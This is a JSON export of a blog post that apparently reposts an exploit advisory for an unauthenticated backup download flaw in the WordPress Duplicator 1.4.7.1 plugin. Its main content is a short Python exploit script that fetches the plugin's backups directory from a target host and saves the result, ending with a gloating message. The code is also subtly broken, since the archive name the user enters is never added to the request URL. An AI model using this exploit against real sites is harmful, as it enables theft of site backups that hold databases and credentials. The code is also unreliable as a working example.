{"id":29031,"date":"2022-08-08T21:02:40","date_gmt":"2022-08-08T17:02:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167994\/wpduplicator1471-disclose.txt"},"modified":"2022-08-10T08:12:28","modified_gmt":"2022-08-10T03:42:28","slug":"wordpress-duplicator-1-4-7-1-backup-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-duplicator-1-4-7-1-backup-disclosure\/","title":{"rendered":"WordPress Duplicator 1.4.7.1 Backup Disclosure"},"content":{"rendered":"<p dir=\"ltr\">## Title: WordPress Plugin Duplicator 1.4.7.1 &#8211; Unauthenticated Backup Download<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 08.08.2022<br \/>\n## Vendor: https:\/\/wordpress.org\/<br \/>\n## Software: https:\/\/wordpress.org\/plugins\/duplicator\/<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated<br \/>\nBackup Download, after an update from the 1.4.7 version.<br \/>\nThe attacker can download all archive information from the system by<br \/>\nusing this vulnerability!<\/p>\n<p dir=\"ltr\">Status: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Exploit:<\/p>\n<p dir=\"ltr\">&#8220;`python<br \/>\n#!\/usr\/bin\/python<br \/>\n# Author nu11secur1ty<br \/>\nimport requests<br \/>\nimport time<\/p>\n<p dir=\"ltr\">vulnerableURL = &#8220;http:\/\/pwned_host.com\/wordpress\/wp-content\/backups-dup-lite\/&#8221;<br \/>\narchive=input(&#8220;Give the name of the archive&#8230;\\n&#8221;)<br \/>\nresponse = requests.get(vulnerableURL)<br \/>\ntime.sleep(5)<br \/>\nopen(archive, &#8220;wb&#8221;).write(response.content)<br \/>\nprint(&#8220;Right now, you just downloaded the secret archive =)\\n&#8221;)<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/ee11bg)<\/p>\n<p dir=\"ltr\">&#8212;<br \/>\nSystem Administrator &#8211; Infrastructure Engineer<br \/>\nPenetration Testing Engineer<br \/>\nExploit developer at https:\/\/packetstormsecurity.com\/<br \/>\nhttps:\/\/cve.mitre.org\/index.html and https:\/\/www.exploit-db.com\/<br \/>\nhome page: https:\/\/www.nu11secur1ty.com\/<br \/>\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br \/>\nnu11secur1ty &lt;http:\/\/nu11secur1ty.com\/&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: WordPress Plugin Duplicator 1.4.7.1 &#8211; Unauthenticated Backup Download ## Author: nu11secur1ty ## Date: 08.08.2022 ## Vendor: https:\/\/wordpress.org\/ ## Software: https:\/\/wordpress.org\/plugins\/duplicator\/ ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin\/1.4.7.1 ## Description: The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated Backup Download, after an update from the 1.4.7 version. The attacker can download all archive information from the system by &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29031","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29031","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29031"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29031\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29031"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29031"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29031"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}